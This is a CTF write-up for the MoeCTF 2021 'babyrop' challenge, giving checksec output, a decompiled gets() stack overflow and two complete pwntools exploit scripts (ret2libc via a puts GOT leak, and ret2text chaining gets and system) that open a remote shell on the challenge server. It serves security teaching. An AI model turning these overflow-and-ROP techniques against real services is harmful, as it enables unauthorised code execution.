
[MoeCTF 2021]babyrop

2026-01-20 06:48 By
shawnctf
PWNROP

Problem: [MoeCTF 2021]babyrop

思路

  1. checksec

    [*] './babyrop'
    Arch: i386-32-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x8048000)
    Stripped: No

  2. decompile

/* Decompiler output for the challenge binary (checksec above: i386, NX on,
   no canary, no PIE). The line comment after `char s[36]` is the
   decompiler's stack annotation: s sits at ebp-0x28. */
int vuln()
{
    char s[36]; // [esp+0h] [ebp-28h] BYREF
    /* gets() has no length limit, so any line longer than the buffer
       overwrites the saved ebp and the return address; with no stack
       canary nothing detects this. A bounded read such as
       fgets(s, sizeof(s), stdin) would close the hole. */
    gets(s);
    return 0;
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
    /* Mode 2 is presumably _IONBF (unbuffered) on glibc, so output
       reaches the client immediately — TODO confirm against the target's
       libc headers. */
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
    puts("Hello,here is lacanva\n");
    puts("I'm a fan of vtubers\n");
    puts("But one day Nana7mi and Azi start their live boradcast at the same time\n");
    puts("Whose live boradcast should I watch?");
    puts("Can you give me some advise?");
    /* vuln() declares no parameters; the argument is a decompiler artefact
       and is ignored. */
    vuln(&argc);
    return 0;
}

EXP

解法一,ret2libc

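"""Solution 1 (ret2libc) for [MoeCTF 2021]babyrop, as given in the writeup.

The binary has NX but no canary and no PIE (checksec above), and vuln()
reads into a 36-byte stack buffer with gets(). Each round sends one
over-long line whose return address points at puts@plt, followed by a
fake return into main so the process survives for the next round.

Changes from the writeup: the unused ROP()/find_gadget("ret") lookup is
dropped and the two identical GOT leaks share one helper.
"""
from pwn import *

f = "./babyrop"
context.binary = elf = ELF(f)
context.log_level = "debug"
# io = process(f)
io = remote("node5.anna.nssctf.cn", 25554)

PROMPT = b"Can you give me some advise?\n"
# 0x28 bytes from s to the saved ebp (see the decompile) plus 4 for ebp itself.
PADDING = b"a" * 0x2c
main_addr = elf.sym["main"]
puts_plt = elf.plt["puts"]


def leak(got_name):
    """Return the runtime address stored in the GOT slot for *got_name*.

    Layout after the padding: puts@plt (overwritten return address),
    main (puts' return address) and the GOT slot (puts' argument).
    The leaked pointer is taken as the four bytes ending in 0xf7, i.e.
    the script assumes libc's top byte is 0xf7 on the target; it is a
    heuristic tied to that address layout, not a parsed response.
    """
    chain = PADDING + p32(puts_plt) + p32(main_addr) + p32(elf.got[got_name])
    io.sendlineafter(PROMPT, chain)
    addr = u32(io.recvuntil(b"\xf7")[-4:])
    success(f"{got_name}_addr: {addr:#x}")
    return addr


puts_addr = leak("puts")
gets_addr = leak("gets")

# Identify the remote libc build from the page offsets (low 12 bits) of two
# symbols; select_index=1 hard-codes which of the candidate builds is used.
filename = libcdb.search_by_symbol_offsets(
    {"puts": puts_addr & 0xFFF, "gets": gets_addr & 0xFFF}, select_index=1
)
libc = ELF(filename)
libc.address = puts_addr - libc.sym["puts"]
system_addr = libc.sym["system"]
binsh_addr = next(libc.search(b"/bin/sh"))
success(f"system_addr: {system_addr:#x}")
success(f"binsh_addr: {binsh_addr:#x}")

# Final round: same frame layout, with system in place of puts.
io.sendlineafter(PROMPT, PADDING + p32(system_addr) + p32(main_addr) + p32(binsh_addr))
io.interactive()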

解法二,ret2text

"""Solution 2 (ret2text) for [MoeCTF 2021]babyrop, as given in the writeup.

Same gets() overflow as solution 1, but no libc leak is needed: the chain
calls gets@plt to store a second input line in .bss and then system@plt
with that buffer as its argument. NOTE(review): this relies on system
being imported by the binary (elf.plt["system"]); the decompiled excerpt
above does not show its call site.
"""
from pwn import *

f = "./babyrop"
context.binary = elf = ELF(f)
context.log_level = "debug"
# io = process(f)
io = remote("node5.anna.nssctf.cn", 28259)

# Writable scratch area in .bss (address as given in the writeup).
bss_addr = 0x804A028

# 0x28 bytes to the saved ebp (see the decompile) + 4 for ebp itself, then:
#   gets@plt   - overwritten return address of vuln
#   system@plt - gets' return address, so system runs next
#   bss_addr   - gets' argument; later read as system's (never used) return address
#   bss_addr   - system's argument: the buffer gets just filled
chain = [
    elf.plt["gets"],
    elf.plt["system"],
    bss_addr,
    bss_addr,
]
payload = b"a" * 0x2C + b"".join(p32(word) for word in chain)

io.sendline(payload)
io.sendline(b"/bin/sh")  # consumed by the injected gets() call
io.interactive()

总结

ret2libc.

© 著作权归作者所有